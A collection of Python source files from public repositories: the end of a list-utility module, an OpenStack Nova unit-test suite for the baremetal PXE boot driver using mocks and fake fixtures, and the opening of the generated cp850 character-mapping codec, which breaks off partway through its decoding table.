Return a list of the items in both l1 and l2. The list is in
arbitrary order.
"""
inter = []
words1 = count(l1)
for w in l2:
if words1.has_key(w):
inter.append(w)
del words1[w] # don't add the same word twice
return inter
def difference(l1, l2):
"""difference(l1, l2) -> list of items in l1, but not l2
Return a list of the items in l1, but not l2. The list is in
arbitrary order.
"""
diff = []
words2 = count(l2)
for w in l1:
if not words2.has_key(w):
diff.append(w)
words2[w] = 1 # don't add the same word twice
return diff
def itemindex(l):
"""itemindex(l) -> dict of item : index of item
Make an index of the items in the list. The dictionary contains
the items in the list as the keys, and the index of the first
occurrence of the item as the value.
"""
dict = {}
for i in range(len(l)):
if not dict.has_key(l[i]):
dict[l[i]] = i
return dict
def indexesof(l, fn, opposite=0):
"""indexesof(l, fn) -> list of indexes
Return a list of indexes i where fn(l[i]) is true.
"""
indexes = []
for i in range(len(l)):
f = fn(l[i])
if (not opposite and f) or (opposite and not f):
indexes.append(i)
return indexes
def take(l, indexes):
"""take(l, indexes) -> list of just the indexes from l"""
items = []
for i in indexes:
items.append(l[i])
return items
def take_byfn(l, fn, opposite=0):
indexes = indexesof(l, fn, opposite=opposite)
return take(l, indexes)
|
sridevikoushik31/openstack
|
refs/heads/T11906
|
nova/tests/baremetal/test_pxe.py
|
1
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for baremetal pxe driver."""
import os
import mox
from oslo.config import cfg
from testtools import matchers
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.tests.baremetal.db import base as bm_db_base
from nova.tests.baremetal.db import utils as bm_db_utils
from nova.tests.image import fake as fake_image
from nova.tests import utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import db
from nova.virt.baremetal import pxe
from nova.virt.baremetal import utils as bm_utils
from nova.virt.disk import api as disk_api
from nova.virt import fake as fake_virt
CONF = cfg.CONF
COMMON_FLAGS = dict(
firewall_driver='nova.virt.baremetal.fake.FakeFirewallDriver',
host='test_host',
)
BAREMETAL_FLAGS = dict(
driver='nova.virt.baremetal.pxe.PXE',
instance_type_extra_specs=['cpu_arch:test', 'test_spec:test_value'],
power_manager='nova.virt.baremetal.fake.FakePowerManager',
vif_driver='nova.virt.baremetal.fake.FakeVifDriver',
volume_driver='nova.virt.baremetal.fake.FakeVolumeDriver',
group='baremetal',
)
class BareMetalPXETestCase(bm_db_base.BMDBTestCase):
def setUp(self):
super(BareMetalPXETestCase, self).setUp()
self.flags(**COMMON_FLAGS)
self.flags(**BAREMETAL_FLAGS)
self.driver = pxe.PXE(fake_virt.FakeVirtAPI())
fake_image.stub_out_image_service(self.stubs)
self.addCleanup(fake_image.FakeImageService_reset)
self.context = utils.get_test_admin_context()
self.test_block_device_info = None,
self.instance = utils.get_test_instance()
self.test_network_info = utils.get_test_network_info(),
self.node_info = bm_db_utils.new_bm_node(
service_host='test_host',
cpus=4,
memory_mb=2048,
prov_mac_address='11:11:11:11:11:11',
)
self.nic_info = [
{'address': '22:22:22:22:22:22', 'datapath_id': '0x1',
'port_no': 1},
{'address': '33:33:33:33:33:33', 'datapath_id': '0x2',
'port_no': 2},
]
def _create_node(self):
self.node = db.bm_node_create(self.context, self.node_info)
for nic in self.nic_info:
db.bm_interface_create(
self.context,
self.node['id'],
nic['address'],
nic['datapath_id'],
nic['port_no'],
)
self.instance['node'] = self.node['id']
self.spawn_params = dict(
admin_password='test_pass',
block_device_info=self.test_block_device_info,
context=self.context,
image_meta=utils.get_test_image_info(None,
self.instance),
injected_files=[('/fake/path', 'hello world')],
instance=self.instance,
network_info=self.test_network_info,
)
class PXEClassMethodsTestCase(BareMetalPXETestCase):
def test_build_pxe_config(self):
args = {
'deployment_id': 'aaa',
'deployment_key': 'bbb',
'deployment_iscsi_iqn': 'ccc',
'deployment_aki_path': 'ddd',
'deployment_ari_path': 'eee',
'aki_path': 'fff',
'ari_path': 'ggg',
}
config = pxe.build_pxe_config(**args)
self.assertThat(config, matchers.StartsWith('default deploy'))
# deploy bits are in the deploy section
start = config.index('label deploy')
end = config.index('label boot')
self.assertThat(config[start:end], matchers.MatchesAll(
matchers.Contains('kernel ddd'),
matchers.Contains('initrd=eee'),
matchers.Contains('deployment_id=aaa'),
matchers.Contains('deployment_key=bbb'),
matchers.Contains('iscsi_target_iqn=ccc'),
matchers.Not(matchers.Contains('kernel fff')),
))
# boot bits are in the boot section
start = config.index('label boot')
self.assertThat(config[start:], matchers.MatchesAll(
matchers.Contains('kernel fff'),
matchers.Contains('initrd=ggg'),
matchers.Not(matchers.Contains('kernel ddd')),
))
def test_build_network_config(self):
net = utils.get_test_network_info(1)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertIn('eth1', config)
def test_build_network_config_dhcp(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-dhcp.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0][1]['ips'][0]['ip'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet dhcp', config)
self.assertNotIn('address 1.2.3.4', config)
def test_build_network_config_static(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0][1]['ips'][0]['ip'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('address 1.2.3.4', config)
def test_image_dir_path(self):
self.assertEqual(
pxe.get_image_dir_path(self.instance),
os.path.join(CONF.instances_path, 'instance-00000001'))
def test_image_file_path(self):
self.assertEqual(
pxe.get_image_file_path(self.instance),
os.path.join(
CONF.instances_path, 'instance-00000001', 'disk'))
def test_pxe_config_file_path(self):
self.instance['uuid'] = 'aaaa-bbbb-cccc'
self.assertEqual(
pxe.get_pxe_config_file_path(self.instance),
os.path.join(CONF.baremetal.tftp_root,
'aaaa-bbbb-cccc', 'config'))
def test_pxe_mac_path(self):
self.assertEqual(
pxe.get_pxe_mac_path('23:45:67:89:AB'),
os.path.join(CONF.baremetal.tftp_root,
'pxelinux.cfg', '01-23-45-67-89-ab'))
def test_get_instance_deploy_ids(self):
self.instance['extra_specs'] = {
'deploy_kernel_id': 'aaaa',
'deploy_ramdisk_id': 'bbbb',
}
self.flags(deploy_kernel="fail", group='baremetal')
self.flags(deploy_ramdisk="fail", group='baremetal')
self.assertEqual(
pxe.get_deploy_aki_id(self.instance), 'aaaa')
self.assertEqual(
pxe.get_deploy_ari_id(self.instance), 'bbbb')
def test_get_default_deploy_ids(self):
self.instance['extra_specs'] = {}
self.flags(deploy_kernel="aaaa", group='baremetal')
self.flags(deploy_ramdisk="bbbb", group='baremetal')
self.assertEqual(
pxe.get_deploy_aki_id(self.instance), 'aaaa')
self.assertEqual(
pxe.get_deploy_ari_id(self.instance), 'bbbb')
def test_get_partition_sizes(self):
# default "kinda.big" instance
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(sizes[0], 40960)
self.assertEqual(sizes[1], 1024)
def test_swap_not_zero(self):
# override swap to 0
instance_type = utils.get_test_instance_type(self.context)
instance_type['swap'] = 0
self.instance = utils.get_test_instance(self.context, instance_type)
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(sizes[0], 40960)
self.assertEqual(sizes[1], 1)
def test_get_tftp_image_info(self):
instance_type = utils.get_test_instance_type()
# Raises an exception when options are neither specified
# on the instance nor in configuration file
CONF.baremetal.deploy_kernel = None
CONF.baremetal.deploy_ramdisk = None
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# Test that other non-true values also raise an exception
CONF.baremetal.deploy_kernel = ""
CONF.baremetal.deploy_ramdisk = ""
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# Even if the instance includes kernel_id and ramdisk_id,
# we still need deploy_kernel_id and deploy_ramdisk_id.
# If those aren't present in instance[], and not specified in
# config file, then we raise an exception.
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# If an instance doesn't specify deploy_kernel_id or deploy_ramdisk_id,
# but defaults are set in the config file, we should use those.
# Here, we confirm both that all four values were set
# and that the proper paths are getting set for all of them
CONF.baremetal.deploy_kernel = 'cccc'
CONF.baremetal.deploy_ramdisk = 'dddd'
base = os.path.join(CONF.baremetal.tftp_root, self.instance['uuid'])
res = pxe.get_tftp_image_info(self.instance, instance_type)
expected = {
'kernel': ['aaaa', os.path.join(base, 'kernel')],
'ramdisk': ['bbbb', os.path.join(base, 'ramdisk')],
'deploy_kernel': ['cccc', os.path.join(base, 'deploy_kernel')],
'deploy_ramdisk': ['dddd',
os.path.join(base, 'deploy_ramdisk')],
}
self.assertEqual(res, expected)
# If deploy_kernel_id and deploy_ramdisk_id are specified on
# image extra_specs, this should override any default configuration.
# Note that it is passed on the 'instance' object, despite being
# inherited from the instance_types_extra_specs table.
extra_specs = {
'deploy_kernel_id': 'eeee',
'deploy_ramdisk_id': 'ffff',
}
instance_type['extra_specs'] = extra_specs
res = pxe.get_tftp_image_info(self.instance, instance_type)
self.assertEqual(res['deploy_kernel'][0], 'eeee')
self.assertEqual(res['deploy_ramdisk'][0], 'ffff')
# However, if invalid values are passed on the image extra_specs,
# this should still raise an exception.
extra_specs = {
'deploy_kernel_id': '',
'deploy_ramdisk_id': '',
}
instance_type['extra_specs'] = extra_specs
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
class PXEPrivateMethodsTestCase(BareMetalPXETestCase):
def test_collect_mac_addresses(self):
self._create_node()
address_list = [nic['address'] for nic in self.nic_info]
address_list.append(self.node_info['prov_mac_address'])
address_list.sort()
macs = self.driver._collect_mac_addresses(self.context, self.node)
self.assertEqual(macs, address_list)
def test_cache_tftp_images(self):
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
instance_type = utils.get_test_instance_type()
extra_specs = {
'deploy_kernel_id': 'cccc',
'deploy_ramdisk_id': 'dddd',
}
instance_type['extra_specs'] = extra_specs
image_info = pxe.get_tftp_image_info(self.instance, instance_type)
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(os.path.join(CONF.baremetal.tftp_root,
self.instance['uuid'])).AndReturn(True)
for uuid, path in [image_info[label] for label in image_info]:
os.path.exists(path).AndReturn(True)
self.mox.ReplayAll()
self.driver._cache_tftp_images(
self.context, self.instance, image_info)
self.mox.VerifyAll()
def test_cache_image(self):
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(pxe.get_image_dir_path(self.instance)).\
AndReturn(True)
os.path.exists(pxe.get_image_file_path(self.instance)).\
AndReturn(True)
self.mox.ReplayAll()
image_meta = utils.get_test_image_info(
self.context, self.instance)
self.driver._cache_image(
self.context, self.instance, image_meta)
self.mox.VerifyAll()
def test_inject_into_image(self):
# NOTE(deva): we could also test this method by stubbing
# nova.virt.disk.api._inject_*_into_fs
self._create_node()
files = []
self.instance['hostname'] = 'fake hostname'
files.append(('/etc/hostname', 'fake hostname'))
self.instance['key_data'] = 'fake ssh key'
net_info = utils.get_test_network_info(1)
net = pxe.build_network_config(net_info)
admin_password = 'fake password'
self.mox.StubOutWithMock(disk_api, 'inject_data')
disk_api.inject_data(
admin_password=admin_password,
image=pxe.get_image_file_path(self.instance),
key='fake ssh key',
metadata=None,
partition=None,
net=net,
files=files, # this is what we're really testing
).AndReturn(True)
self.mox.ReplayAll()
self.driver._inject_into_image(
self.context, self.node, self.instance,
network_info=net_info,
admin_password=admin_password,
injected_files=None)
self.mox.VerifyAll()
class PXEPublicMethodsTestCase(BareMetalPXETestCase):
def test_cache_images(self):
self._create_node()
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(pxe, "get_tftp_image_info")
self.mox.StubOutWithMock(self.driver, "_cache_tftp_images")
self.mox.StubOutWithMock(self.driver, "_cache_image")
self.mox.StubOutWithMock(self.driver, "_inject_into_image")
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn([])
self.driver._cache_tftp_images(self.context, self.instance, [])
self.driver._cache_image(self.context, self.instance, [])
self.driver._inject_into_image(self.context, self.node, self.instance,
self.test_network_info, None, '')
self.mox.ReplayAll()
self.driver.cache_images(
self.context, self.node, self.instance,
admin_password='',
image_meta=[],
injected_files=None,
network_info=self.test_network_info,
)
self.mox.VerifyAll()
def test_destroy_images(self):
self._create_node()
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
bm_utils.unlink_without_raise(pxe.get_image_file_path(self.instance))
bm_utils.rmtree_without_raise(pxe.get_image_dir_path(self.instance))
self.mox.ReplayAll()
self.driver.destroy_images(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_bootloader_passes_details(self):
self._create_node()
macs = [nic['address'] for nic in self.nic_info]
macs.append(self.node_info['prov_mac_address'])
macs.sort()
image_info = {
'deploy_kernel': [None, 'aaaa'],
'deploy_ramdisk': [None, 'bbbb'],
'kernel': [None, 'cccc'],
'ramdisk': [None, 'dddd'],
}
self.instance['uuid'] = 'fake-uuid'
iqn = "iqn-%s" % self.instance['uuid']
pxe_config = 'this is a fake pxe config'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
image_path = pxe.get_image_file_path(self.instance)
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(pxe, 'get_partition_sizes')
self.mox.StubOutWithMock(bm_utils, 'random_alnum')
self.mox.StubOutWithMock(pxe, 'build_pxe_config')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn(image_info)
pxe.get_partition_sizes(self.instance).AndReturn((0, 0))
bm_utils.random_alnum(32).AndReturn('alnum')
pxe.build_pxe_config(
self.node['id'], 'alnum', iqn,
'aaaa', 'bbbb', 'cccc', 'dddd').AndReturn(pxe_config)
bm_utils.write_to_file(pxe_path, pxe_config)
for mac in macs:
bm_utils.create_link_without_raise(
pxe_path, pxe.get_pxe_mac_path(mac))
self.mox.ReplayAll()
self.driver.activate_bootloader(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_and_deactivate_bootloader(self):
self._create_node()
instance_type = {
'extra_specs': {
'deploy_kernel_id': 'eeee',
'deploy_ramdisk_id': 'ffff',
}
}
self.instance['uuid'] = 'fake-uuid'
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn(
instance_type)
# create the config file
bm_utils.write_to_file(mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink and link the 3 interfaces
for i in range(3):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.create_link_without_raise(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink all 3 interfaces, 4 images, and the config file
for i in range(8):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.rmtree_without_raise(mox.StrContains('fake-uuid'))
self.mox.ReplayAll()
# activate and deactivate the bootloader
# and check the deployment task_state in the database
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is None)
self.driver.activate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is not None)
self.driver.deactivate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is None)
self.mox.VerifyAll()
def test_deactivate_bootloader_for_nonexistent_instance(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(self.driver, '_collect_mac_addresses')
extra_specs = dict(extra_specs=dict(deploy_ramdisk_id='ignore',
deploy_kernel_id='ignore'))
pxe.get_tftp_image_info(self.instance, extra_specs).\
AndRaise(exception.NovaException)
bm_utils.unlink_without_raise(pxe_path)
self.driver._collect_mac_addresses(self.context, self.node).\
AndRaise(db_exc.DBError)
bm_utils.rmtree_without_raise(
os.path.join(CONF.baremetal.tftp_root, 'fake-uuid'))
self.mox.ReplayAll()
self.driver.deactivate_bootloader(
self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_node(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
self.flags(pxe_deploy_timeout=1, group='baremetal')
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYING,
'instance_uuid': 'fake-uuid'})
# test timeout
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
# test DEPLOYDONE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYDONE})
self.driver.activate_node(self.context, self.node, self.instance)
# test no deploy -- state is just ACTIVE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.ACTIVE})
self.driver.activate_node(self.context, self.node, self.instance)
# test node gone
db.bm_node_destroy(self.context, 1)
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
|
ericbaze/continuum_code_2012
|
refs/heads/master
|
pydata/moin/pythonenv/local/lib/python2.7/encodings/cp850.py
|
593
|
""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp850',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00ff, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x00d7, # MULTIPLICATION SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x00ae, # REGISTERED SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00b6: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00b7: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x00b8: 0x00a9, # COPYRIGHT SIGN
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x00a2, # CENT SIGN
0x00be: 0x00a5, # YEN SIGN
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x00e3, # LATIN SMALL LETTER A WITH TILDE
0x00c7: 0x00c3, # LATIN CAPITAL LETTER A WITH TILDE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x00a4, # CURRENCY SIGN
0x00d0: 0x00f0, # LATIN SMALL LETTER ETH
0x00d1: 0x00d0, # LATIN CAPITAL LETTER ETH
0x00d2: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00d3: 0x00cb, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00d4: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x00d5: 0x0131, # LATIN SMALL LETTER DOTLESS I
0x00d6: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00d7: 0x00ce, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00d8: 0x00cf, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x00a6, # BROKEN BAR
0x00de: 0x00cc, # LATIN CAPITAL LETTER I WITH GRAVE
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00e3: 0x00d2, # LATIN CAPITAL LETTER O WITH GRAVE
0x00e4: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x00e5: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x00fe, # LATIN SMALL LETTER THORN
0x00e8: 0x00de, # LATIN CAPITAL LETTER THORN
0x00e9: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00ea: 0x00db, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00eb: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x00ec: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
0x00ed: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00ee: 0x00af, # MACRON
0x00ef: 0x00b4, # ACUTE ACCENT
0x00f0: 0x00ad, # SOFT HYPHEN
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2017, # DOUBLE LOW LINE
0x00f3: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00f4: 0x00b6, # PILCROW SIGN
0x00f5: 0x00a7, # SECTION SIGN
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x00b8, # CEDILLA
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x00a8, # DIAERESIS
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x00b9, # SUPERSCRIPT ONE
0x00fc: 0x00b3, # SUPERSCRIPT THREE
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
